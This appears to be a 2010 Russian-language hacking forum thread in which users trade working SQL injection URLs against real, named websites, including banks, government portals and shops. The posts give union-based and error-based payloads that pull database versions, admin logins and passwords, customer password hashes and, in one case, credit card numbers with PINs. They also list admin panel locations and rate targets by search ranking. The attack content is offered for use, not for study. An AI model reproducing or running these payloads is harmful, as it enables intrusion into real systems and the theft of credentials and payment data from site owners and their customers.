http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%28column_ name+separator+0x3a%29,8,9,10,11,12,13,14,15,16+fr om+information_schema.columns+where+table_name=0x6 36c69656e7473+--+
Code:
http://www.unar.fr/pgs/news.php?id=-21+union+select+1,2,3,4,5,6,group_concat%280x0b,id ,0x3a,login,0x3a,pwd%29,8,9,10,11,12,13,14,15,16+f rom+clients+limit+0,20+--+
-PRIVAT-
26.08.2010, 16:09
http://www.colombotown.com/print_advert.php?id=-138+union+select+1,2,3,concat_ws%280x3a,login_id,u serid,pass%29,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2, 3+from+login%20--
PR 1
http://www.vlh.de/cms/news/print_news.php?stID=-298+union+select+1,2,concat%28@i:=0x00,@o:=0x0d0a, benchmark%2844,@o:=CONCAT%28@o,0x0d0a,%28SELECT+co ncat%28table_schema,0x2E,@i:=table_name%29+from+in formation_schema.tables+WHERE+table_name%3E@i+orde r+by+table_name+LIMIT%201%29%29%29,@o%29,4,5,6,7,8 ,9,0,1,2,3,4--
PR 5
http://www.zima-samara.ru/print_news.php?id_n=-5+union+select+1,version%28%29,3,4,5%20--
http://www.bonvk.ru/print_news.php?id=-1822+union+select+1,2,3,4,5,6,7,8,9,0,1+--+
PR 1 ТИЦ 10
http://www.port-all.ru/news/print_news.asp?n=3901+union+select+1,2,3,4,5,6,7,8 ,9+--+
PR 3 ТИЦ 60
http://www.allianz.ua/modules/print_news/mod_print_news.php?mod=news&news=-35+union+select+1,2,3,4 --&lang=ru
PR 4 ТИЦ 250
http://www.kavenit.ru/print_news.php?news_id=-1+union+select+1,2,3,4,5--
PR 3 ТИЦ 10
http://www.moscowatch.ru/swissmade_brand.php?BrandId=-2+union+select+1,2,3--
PR 5 ТИЦ 70
http://www.replicashop.ru/catalog.php?BrandId=-39+union+select+1,2,3 --
ТИЦ 10
%R00tKit%
26.08.2010, 18:56
Ну и я чтоле
Code:
http://www.romanchuk.com.ua/index.php?id=1001+and+1=2+union+select+1,2,3,unhex (hex(group_concat(login,0x3a,password))),5+from+ad min--+
Code:
http://polvent.com/index.php?action=catalog&brand=2&id=58+and+1=2+union+select+1,2,3,group_concat(logi n,0x3a,password,0x0b),5,6,7,8,9,10,11,12,13+from+a dmin--+
Code:
http://mobilstyle.com.ua/view_news.php?id=1+and+1=2+union+select+concat_ws( 0x0b,password),2,3,4,5+from+admin--+
Code:
http://nunhems.com.ua/kultury.php?id=47+and+1=2+union+select+1,2,3,4,5,6 ,7,8,group_concat(user,0x3a,password),10,11,12,13, 14,15,16,17,18,19,20,21,22,23+from+users--+
Code:
http://inkata.lp.edu.ua/index.php?action=news&id=11+and+1=2+union+select+1,2,3,4,5,group_concat( login,0x3a,password),7,8+from+admin--+
shell_c0de
26.08.2010, 20:56
ну продолжим банковскую тему )
USA Merrimack County Savings Bank
Code:
http://www.mcsbnh.com/about/news.php?id=-61+UNION+SELECT+1,version(),3,4,5--
Database Version: 4.1.22-standard
Database name: mcsbnhc_mcsb
User name: mcsbnhc_ensky@localhost
http://www.mcsbnh.com/admin/
http://marketnara.com/home/view_goods.html?pid=-18+union+select+1,group_concat(name,char(58),pass) ,3,4,5,6,7,8,9,10,11,121,3,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28+from+admin
[Feldmarschall]
27.08.2010, 00:05
The Central Bank of Mauritius
Oracle
Code:
http://bom.intnet.mu/?id=-40416+union+select+null+from+sys.dual--
Eastern Caribbean Central Bank
mssql
Code:
http://www.eccb-centralbank.org/About/vac_details.asp?vacID=63+or+1=(select top 1 table_name from information_schema.tables)--
Version:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
*uNkN0Wn*
27.08.2010, 02:15
PR - 5
http://www.valstybe.com/index.php?id=-8051+union+select+1,2,3,4,5,6,version(),8--
user: root@localhost
version: 4.0.25
database: eurovals_valstybe
PR - 7
http://www.fedspending.org/fpds/fpds.php?parent_id=-309123+union+select+group_concat(version(),char(58 ),user(),char(58),database())+--+
version: 4.1.22
user: root@localhost
database: fpds2009z
сайт некой федеральной службы вроде как :\
*uNkN0Wn*
27.08.2010, 13:04
http://www.indiaebazar.com/krishnendu/prodesc.php?pid=-40+union+select+1,group_concat(username,char(58),p assword),3,4,5,6+from+eb_user_login+--+
user() indiaeba_ebauser@localhost
version() 5.0.91-community
database() indiaeba_ebazar
http://www.31girl.com/shop.php?pid=-1+union+select+1,2,3,4,group_concat(CreditCardType ,char(58),CreditCardNumber,char(58),CreditCardName ,char(58),CreditCardPinNumber,0x3c62723e),6,7,8+fr om+shop_orders--
user() i31girl_public@localhost
version() 5.0.91-community
database() i31girl_shop
Credit Cards
*uNkN0Wn*
27.08.2010, 15:12
http://www.cashpawnshop.com/item.php?pid=-212+union+select+1,2,3,group_concat(aid,char(58),p wd,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+nuke_authors+--+
http://www.wofgdesigns.com/shop.php?pid=-22+union+select+1,2,3,4,5,6,group_concat(version() ,0x3c62723e,user(),0x3c62723e,database()),8,9,10,1 1,12+--+
http://www.easypha-max.com/productdetails.php?id=&pid=-440+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+--+
user() platform2u@192.168.0.171
version() 5.0.85-enterprise
database() ec2u
ну что банковская тема еще жива? Кстати заметил что в зоне ру банковские сайты намного защищеннее чем их зарубежные аналоги, хотя и можно при большом желании найти багу
Банк «Объединённый капитал»
Code:
http://www.okbank.ru/?p=-61+union+select+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11,12,13,14,15+--+
-PRIVAT-
28.08.2010, 11:14
http://www.denmanconsulting.com/print_articles.asp?id=149+and+1=@@version%20+--+
PR 1
http://www.sedap-sekejap.com/print_articles.asp?id=1+or+1=%28SELECT+TOP+1+TABLE _NAME+FROM+INFORMATION_SCHEMA.TABLES%29--
PR 4
http://www.france-israel.org/modules/print_articles.php?art_id=-1+union+select+version%28%29%20--
PR 4
http://www.cyberschool.oxfam.org.hk/print_articles.php?id=-90+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d 0a,benchmark%2858,@o:=CONCAT%28@o,0x0d0a,%28SELECT +concat%28table_schema,0x2E,@i:=table_name%29+from +information_schema.tables+WHERE+table_name%3E@i+o rder+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8, 9,0,1,2,3--
ТИЦ 10 PR 6
http://www.ipa.spb.su/html/print_news.php?id=17&nid=-797+union+select+1,2,3,4,5,6,version%28%29,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2--
ТИЦ 10 PR 6
http://www.clarkapartments.com/print_news.asp?id=248+and+1=@@version%20--
ТИЦ 10 PR 5
http://www.emk.ru/print_news.php?id=44+union+select+1,2,3,4,5,6+--+
ТИЦ 220 PR 3
http://www.ekatbo.ru/print_news.php?id=1360+union+select+1,2,3,4,5,6,7, 8,9,0,1--
PR 1
http://www.bosam.ru/print_news.php?id=339+union+select+1,2,3,4,5,6,7,8 ,9,0,1%20--
PR 2
http://www.parlamentiregionali.it/inc/php/print_news.php?id=-59221+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7,8%20+--+
PR 5
http://www.queento.ru/site.php?id=-57+union+select+1,concat_ws(0x3a,login,0x3a,pass_h ash),3,4,5,6,7,8+from+accounts+limit+0,1--
http://www.safarimaldives.com/live.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5+--+
http://www.pacificotowncenter.com/world.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,LOGIN,0x 3a,PASSWORD),8,9,10+from+tbl_admin+--+
*uNkN0Wn*
28.08.2010, 15:54
http://www.ozarkhomesandproperty.com/mls/index.php?client_id=-2+union+select+1,2,group_concat(email),4,5+from+le ads+--+
PR - 6
http://www.virtualstudios.gr/portfolio.cfm?client_id=-85+union+select+1,2,3,4,5,6,group_concat(username, 0x3a,password),8,9,10,11,12,13,14+from+users+--+
http://www.gearjunkies-userstudios.com/studio.php?stid=-221+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13+--+
Getin Holding S.A.
до банка не добрался
Code:
http://www.getin.pl/en/index.php?&level=pnews&&id=-146+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),database(),user()),15,16,17, 18,19,20,21--
Code:
5.1.48-1-log:getin2:getin2@10.0.0.36
http://www.arcdream.com/godlike/power.php?id=-1+union+select+1,group_concat(0x3a,version(),0x3a, database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13, 14,15,16+--+
Яндекс тИЦ 10
Google PageRank 4
*uNkN0Wn*
28.08.2010, 19:22
http://www.machineshopmarketing.com/news.php?id=-138+union+select+1,group_concat(user(),version()), 3,4,5,6,7+--+
вывод в тайтле
Странная скуля. Кто выведет что, объясните в лс.
http://www.smplus.ru/green.php?id_cat=3&id=-15+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables+--+
http://www.dms7.ru/index.php?name=portfolio&part=-4+union+select+group_concat(0x3a,version(),0x3a,us er())+--+
http://www.menani.it/menani/listino.php?id_cat=-20+union%20select+1,2,3,version%28%29,database%28% 29,6,7,8,9,user%28%29,11,12,13,14--
5.0.45-log menaniitdb0001 menaniit0001@w431.widhost.net
http://allmetal.metalgirls.com/wallpaper/wp_list_e.php?id_cat=10%27+union+select+1,concat%2 8Version%28%29,0x3a,Database%28%29,0x3a,User%28%29 %29+LIMIT+1,1--+
5.1.41-3UBUNTU12.6:C1_ALLMETAL:C1_ALLMETAL@LOCALHOST
http://www.medautomotive.it/en/product.php?id_cat=1&id_prod=13+UNION+SELECT+AES_DECRYPT%28AES_ENCRYPT% 28CONCAT%28Version%28%29,0x3a,Database%28%29,0x3a, User%28%29%29,0x71%29,0x71%29,2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35+LIMIT+1,1--+
Database Version: 4.1.16-standard-log
Database name: 030594med
User name: med@66.71.190.104
http://www.wanyone.com/gallery/categoria.php?id_cat=5+union+select+1,concat(Versi on(),0x3a,Database(),0x3a,User())--+
4.1.25-Debian_mt1:db33932_wanyone:db33932_wany@64.13.192. 22
http://ruspioner.ru/ru.php?id_cat=19+union+select+concat%28Version%28% 29,0x3a,Database%28%29,0x3a,User%28%29%29+LIMIT+1, 1
5.4.2-beta-log:ruspioner_new:ruspioner@localhost
http://www.artlounge.net/events_activities.php?id_cat=7+union+select+1,conc at%28Version%28%29,0x3a,Database%28%29,0x3a,User%2 8%29%29,3+LIMIT+1,1
4.1.22-standard-log:356371_artlounge:356371_artlounge@172.16.11.30
http://www.fotosviat.bg/php/contest_month.php?id=-36+or+(select+count(*)from(select+1+union+select+2 +union+select+3)x+group+by+concat(mid((select+vers ion()),1,64),floor(rand(0)*2)))--
http://www.bergerssports.com/events/events_month.php?id=2+group+by+7+--+
http://www.gold-mile.ru/houses/index.php?type=specials&id=86+union+select+1,2+--+
ТИЦ : 10 PR: 4
http://www.lavina.ru/window.php?id=128+'+UnIon+selECt+1,2,version(),4,5 ,6,7,8,9,10+--+
ТИЦ : 50 PR: 3
http://www.promoonly.com/search/printfriendly_month.php?id_fp=1&month=1&year=-2008
ТИЦ : 10
stepashka_
29.08.2010, 15:40
Code:
http://www.briarshallhotel.co.uk/window.php?id=-71+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5--+
5.1.48-community-log:web86-briars:web86-briars@localhost
PageRank 3
Code:
http://pushino-oka.ru/desk/ind.php?pn=6&id_categ=-42+union+select+1,2,3,4,5,6,TABLE_NAME,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+FROM%20INFORMAT ION_SCHEMA.TABLES--+
5.0.84-percona-highperf-b18-log:Markus7_desk:Markus7_desk@194.176.118.6
тиц 20
http://www.kraina-z.com.ua/discount.php?id=1'+UnIon+selECt+1,2,3,group_concat (table_name+separator+'%3Cbr%3E'),5+from+informati on_schema.tables--+
ТИЦ : 10
http://www.moto-r.org/view_massage.php?id=-39+UnIon+selECt+1,2,concat_ws(0x3a,id,user,pass),4 ,5,6,7,8,9,10,11+from+userlist+--+
daniel_1024
29.08.2010, 23:52
похек GOV
Code:
http://www.zzhk.gov.cn/zwgk/xxgk_show.php?id=13809+and+1=0+union+select+1,vers ion(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
PR: 4 Tcy: 0
Database Version: 5.0.45-community-nt
Database name: zzhk
User name: zzhk@localhost
OC type: Win32
http://www.zzhk.gov.cn/phpmyadmin/ - 200 OK
Code:
http://www.crbio03.gov.br/sobre/index.php?id=1709+and+1=0+union+select+1,2,version (),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23--
PR: 5 Tcy: 0
Database Version: 5.0.90-community
Database name: crbio3_crbio3c
User name: crbio3_crbio3@localhost
OC type: pc-linux-gnu
Code:
http://www.iz.sp.gov.br/pesq_bia.php?id=17209+and+1=0+union+select+1,2,3,4 ,5,version(),7,8,9,10,11,12,13,14,15,16--
PR: 5 Tcy: 0
Database Version: 5.0.77
Database name: db_zootecnia
User name: site@localhost
OC type: portbld-freebsd6.2
File_priv:Y
http://www.iz.sp.gov.br/phpinfo.php - 200 OK
stepashka_
30.08.2010, 00:37
Code:
http://ukrboard.info/ind.php?pn=1&id_typ=-49+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--+
5.0.22:vetaxa_ukrboard:vetaxa_do8@localhost
тиц 20
PageRank 2
Админка http://ukrboard.info/Admin/
Code:
http://www.cbo.kz/board/ind.php?pn=1&id_categ=-29+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,33--+
5.0.91-LOG:V-271_BOARD:V-271_BOARDMAN@VKZ1.HOSTER.KZ
тиц 40
PageRank 3
Code:
http://www.kay.by/rasprodaza/ind.php?pn=2&id_typ=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
4.1.22-standard:kayby_1:kayby_1@localhost
тиц 30
PageRan 5
Code:
http://www.mckn.ru/gocka/ind.php?pn=0&id_categ=-3+union+select+1,2,3,4,5,UNHEX(HEX(concat_ws(0x3a, version(),database(),user()))),7,8,9,10,11,12,13,1 4,15--+
4.1.11-Debian_4sarge5-log:z59769_mckn:z59769_mckn@77.221.130.17
тиц 230
PageRank 2
Админка http://www.mckn.ru/admin/
Code:
http://www.autodvor.com/ind.php?pn=3&id_categ=-209+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23--+
5.1.47-community-log:bestmobi_doska:bestmobi_admin@localhost
тиц 10
PageRank 2
Админка http://www.autodvor.com/Admin/
Code:
http://www.master-class-realty.ru/doska/ind.php?pn=1&id_typ=-162+union+select+1,2,3,4,5,concat_ws(0x3a,version( ),database(),user()),7,8,9,10,11,12,13--+
5.0.45-LOG:MASTERDOSKI6:ROOT@LOCALHOST
тиц 80
http://www.eastpsych.com.au/pro.php?id=-77+UnIon+selECt+1,2,3,4,5,6,7,8+--+
http://www.snowboardprofiles.com/pro.php?id=-3+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,version(),21,22,23,24,25,26,27,28,29, 30,31,32,33,34+--+
PR: 2
Strilo4ka
30.08.2010, 13:30
Code:
http://stitch.kh.ua/index.php?section=products&action=list&category=49%20and%20%28select%20count%28*%29%20fro m%20%28select%201%20union%20select%202%20union%20s elect%203%29x%20group%20by%20concat%28%28%20Select %20COLUMN_NAME%20FROM%20information_schema.COLUMNS %20WHERE%20TABLE_NAME=0x75736572%20and%20TABLE_SCH EMA=0x7374697463685f73686f70%20%20limit%200,1%29,f loor%28rand%280%29*2%29%29%29%23
админко /admin
CMS MIB 2008
ветка 5.0.51a-24+lenny2-log, БД stitch_shop, user stitch@localhost, сервер debian-linux-gnu
columns user
idс login password userid usergroupid membergroupids displaygroupid username password passworddate email1 styleid parentemail1 homepage icq aim yahoo1...
БД
information_schema belson rpo_itstep_forum stitch?shop stitch_forum stitch_oscommerce stitch_shop
Code:
http://hsr.kh.ua/services/main/index.php?go=index-2&type=2%20and%200%20union%20select%20111111111111%2 3&add=index22
Code:
http://www.news2news.com/vfp/?group=13+and+5=@@version--+&=0&PHPSESSID=a8c7ba850a36c4fceef6149ec16a7424 -> true
http://www.news2news.com/vfp/?group=13+and+4=@@version--+&=0&PHPSESSID=a8c7ba850a36c4fceef6149ec16a7424 -> false
www.news2news.com:sarcastic_hand: на нём итак повсюду ошибки и бес иньекции.
Code:
http://www.imaginenative.org/gallery_preview.php?id=24&y=99%27%20+%20and%201=%28select%20count%28*%29%20f rom%20%28select%201%20union%20select%202%20union%2 0select%203%29x%20group%20by%20concat%28version%28 %29,floor%28rand%280%29*2%29%29%29--+
Duplicate entry '5.0.851' for key 1
portbld-freebsd7.21
columns table login:
login_fname login_lname username password
columns table clients:
id client_role client_contact_first_name client_contact_last_name client_aboriginal
client_indigenous_affiliation lient_company_name client_street client_city client_province
client_postalcode client_country client_phone_type client_phone_country_code client_phone
client_phone_ext client_phone_type client_fax client_email client_web client_artist_bio client_artist_other_works
client_ts client_call_id client_address_type lient_address_unit client_street_Part2 client_main_contact
client_phone1_area_code client_phone1_part_one client_phone1_part_two client_phone2_area_code client_phone2_part_one client_phone2_part_two client_fax_area_code client_fax_part_one
Code:
http://www.abbeyfield.ca/story.php?aid=54+union+select+1,2,3,4,5,6,7--+
db481269@localhost
information_schema:db481269
house_info
id:society_name:house_name:location:city:founded:c apacity:contact:contact_phone:contact_email:cost:w ebsite:in
Code:
http://www.sierra.ca/news.php?id=25%20and%200%20union%20select%201,GROU P_CONCAT%28SCHEMA_NAME%20SEPARATOR%20%27:%27%29,3, 4,5,6,7%20FROM%20information_schema.SCHEMATA--+
Strilo4ka
30.08.2010, 14:16
Code:
http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,concat_ws%280x3a,ve rsion%28%29,database%28%29,user%28%29,@@version_co mpile_os%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28%23/
5.0.45:AllOde:WebSite@localhost:redhat-linux-gnu
БД
information_schema:AllOde:Evgen:dbwap:jom_:luzanov ka_db:mysqlds17
PosOut:anketa:banners:extr:groups:job_rel:klvidjob :kodsng:kodukr:kodword:link_anketa:marshrut:messag e:navigator:newseoplehoneosin:rubricator:street:st ruode:tamoj:txtvals:user_info:vlastukr
user_info
id_user:name_userass_user:copy_password:mail_user: icq_userhone_user:url_user:city_user:firm_user:inf o_user
Code:
http://mercury.odessa.ua/details/32664 union select 1,2,3,concat_ws(0x3a,name_user,pass_user),5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28 FROM user_info limit 0,1/
Code:
http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,aes_decrypt%28aes_e ncrypt%28pass_user,1%29,1%29,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20FR OM%20user_info%20limit%201,1/
http://turniere.govb.de/bbc/ - тут pr0, а тут уже http://turniere.govb.de pr4 и тиц10
Через ошибку узнаем префикс таблиц со схемы это bbc_
Вытаскиваем данные 1-ого админа:
Code:
http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20 from%20%28select%201%20union%20select%202%20union% 20select%203%29x%20group%20by%20concat%28%28select %20user_loginname%20from%20bbc_user%20limit%200,1% 29,0x3a,%28select%20user_password%20from%20bbc_use r%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%2 9%29
Пасс сложный.
Вытаскиваем 2-ого админа:
Code:
http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20 from%20%28select%201%20union%20select%202%20union% 20select%203%29x%20group%20by%20concat%28%28select %20user_loginname%20from%20bbc_user%20where%20user _admin=1%20limit%201,1%29,0x3a,%28select%20user_pa ssword%20from%20bbc_user%20limit%201,1%29,0x3a,flo or%28rand%280%29*2%29%29%29
Пасс легко брутабельный.
Но в админке прав нет, шелл не залит.
pr3
Code:
http://psphungary.hu/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from %20%28select%20count%28*%29%20from%20%28select%201 %20union%20select%202%20union%20select%203%29x%20g roup%20by%20concat%28%28select%20%20concat_ws%280x 3a,user_loginname,user_password%29%20from%20e107_u ser%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29 %29%29y%29--+
Админка другая, шелл не залит.
pr2
Code:
http://www.kirovfishing.ru/e107_plugins/nboard/nboard.php?cat=1) and 1=(select 1 from (select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(0x3a,user_loginname,user_password) from e107_user limit 0,1),0x3a,floor(rand(0)*2)))y)--+
Прав нет, шелл не залит.
pr1
Code:
http://bagazniki.com.ua/index.php?id=688+and+%28select%20count%28*%29%20fr om%20%28select%201%20union%20select%202%20union%20 select%203%29x%20group%20by%20concat%28version%28% 29,floor%28rand%280%29*2%29%29%29
pr4
Code:
http://www.pogoda.ua/index.php?id=4+and+0+union+select+1,concat_ws%280x 3a,login,password%29,3,4,5+from+users+limit+0,1--+
pr3 => голубые заставили к кодировке нужной привести
Code:
http://www.menoboy.com/repertoire-videos-gays/extrait-video-gay.php?id=269+union+select+1,2,3,4,5,6,7,unhex%28 hex%28concat_ws%280x3a,version%28%29,user%28%29,da tabase%28%29,@@version_compile_os%29%29%29,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+
4.1.11:db1@localhost:db1:mandrake-linux-gnu
сори мб есть баян времени нет проверить.
stepashka_
30.08.2010, 16:04
Code:
http://mexco.ru/ind.php?pn=0&id_categ=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
5.0.77-log:gecto756_mexco:gecto756_mexco@localhost
тиц 20
PageRank 2
Админка http://mexco.ru/Admin/
ps/ поищите поля))
Code:
http://kaktak.net/dosk/ind.php?pn=1&id_categ=-15+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
5.0.67-community:sdelka5_kaktak:sdelka5_sdelka5@localhost
тиц 150
PageRan 1
http://www.travelwheel.ru/runs/foto4.php?id=-1469+union+select+1,2,3,4,5,6,version(),8+--+
ТИЦ : 10 PR: 2
http://www.jks2000.ru/index.php?id=33+'+union+select+1,2,3,version(),5,6 +--+
ТИЦ : 20 PR: 2
http://akmeo.rus.net/index.php?id=119+union+select+1+--+
ТИЦ : 50
http://www.piter-print.ru/index.php?id=3'
ТИЦ : 20
http://www.mwis.org.uk/webcams.php?cam=-15+union+select+1,2,version(),4,5,6--
http://www.aact.org.gh/newsite/pages/press/index.php?id=-10'+union+select+1,2,3,4,unhex(hex(versi
on())),6+order+by+'4
http://www.online.scouting.org.za/calendar/eventdisplay.php?id=-766+union+select+1,2,version()--
stepashka_
30.08.2010, 19:46
Code:
http://www.scotish.ru/board/ind.php?pn=2&id_categ=-42+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--+
4.1.22-standard-log:scotish_board:scotish_admin@localhost
тиц 10
PageRank 2
Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21+--+
5.1.45:db1708c:us1708c@10.0.1.39
Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,group_concat(column_name ),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+FROM+I NFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x70687 062625f7573657273+--+
Code:
http://www.fazendeiro.ru/board/ind.php?pn=1&id_categ=-31+union+select+1,2,3,4,5,username,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21+FROM+phpbb_users+--+
тиц 50
http://www.lankapetlovers.com/petInfo_details.php?infoId=-2510+union+select+1,2,concat(username,char(58),pas sword),4+from+users
e[X]theta[M]ine
31.08.2010, 01:23
http://bazar-auto.ru/board/ind.php?pn=1&id_categ=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
PR:5
ТИЦ:160
http://www.hajosalfred.hu/eng/flow.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os)--
http://www.helpersofmary.org/community.php?id=-17+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10, 11--
http://www.collinsbuilders.net/community.php?id=-20+union+select+1,2,3,4--
http://www.wentworthseniorliving.com/wentworth/community.php?id=-2+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23--
http://www.goxgo.ca/community.php?id=-11+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user(),@@version_compile_os),7,8,9,10, 11--
http://www.helpersofmary.org/community.php?id=-51+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),4,5,6,7,8,9,10, 11--
theta[M]ine"]
e[X]theta[M]ine said:
http://bazar-auto.ru/board/ind.php?pn=1&id_categ=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
PR:5
ТИЦ:160
то что ты выложил- инжектом назвать сложно, запрос по твоей теме примерно должен был бы выглядеть вот так
Code:
http://bazar-auto.ru/board/ind.php?pn=1&id_categ=-1+union+select+1,2,3,4,5,concat(login,char(58),pas sword),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from +tbl_admin_users+--+
муниципальный сайт города АЛУШТА
муниципальный сайт города АЛУШТА
http://www.alushta.crimea.ua/rest/type_rest.php?type=-1+and+1=2+union+all+select+concat_ws(0x3a,login,pa ssword,email),2,3,4,5,6,7,8,9,10+from+users--
http://www.romenewsbywatson.com/inside.php?id=-62+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24+from+adminusers+--+
PR: 3
http://www.bhcc.mass.edu/inside/inside.php?navID=132&id=257'+UnIon+selECt+1,version(),3,4,5,6,7,8,9,10, 11,12,13,14,15,16+--+
ТИЦ : 10
http://www.finger-lakes-tours.com/inside.php?id=-167'+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17+--+
http://www.awrad.org/einside.php?id=-4+union+select+1,2,3,4,5+--+
Axel_Ustus
31.08.2010, 12:26
http://www.artspace.org.au/gallery_project.php?i=132+union+select+1,2,3,4,5,v ersion%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24--
моя первая)
выложенная здесь
http://www.vpole.ru/press/?id=-1741+union+select+1,2,concat_ws%280x3a,user,passwd %29,4,5,6,7+from+users+limit+0,1--+
ТИЦ : 375 PR: 5
http://tatalc.ru/tatalc2/?pg=3&bl=1&md=2&iddoc=-17499'+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,login ,passwd),7,8,9,10,11,12,13,14,15,16,17,18,19+from+ access_users+limit+0,1--+
ТИЦ : 350
LiRvD082
31.08.2010, 17:24
http://www.proday-biznes.ru/index.php?module=shop&file=checkout&id=-1+OR+(SELECT+COUNT(*)+FROM+(select+count(0),concat ((select+CONCAT(0x75737372,concat(0x7665723a,versi on()),0x75737372)+from+information_schema.tables+l imit+0,1),floor(rand(0)*2))+from+information_schem a.tables+group+by+2+limit+0,1)a)--+
....
daniel_1024
31.08.2010, 18:29
1,5к хэшей за один запрос))
http://bomond.net.ua/my/compare.php?id=131269+and+1=0+union+select+1,conca t(@i:=0x00,@o:=0x0d0a,benchmark(1500,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=customers_password) from bomondlg_bomondshop.customers WHERE customers_password >@i order by customers_password LIMIT 1))),@o)
уберите где надо пробелы...
З.Ы. укоротил ссылку - http://is.gd/eNo1p
Заходить желательно через ФФ
http://www.clean-up.ru/cat.php?id=-511+union+select+group_concat%28table_name%29,2,3, 4,5,6+from+information_schema.tables--+
ТИЦ : 20
Таблица admin : username,PASSWORD
http://www.rzeczna.pl/lineage.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75+--+
SQL Injection
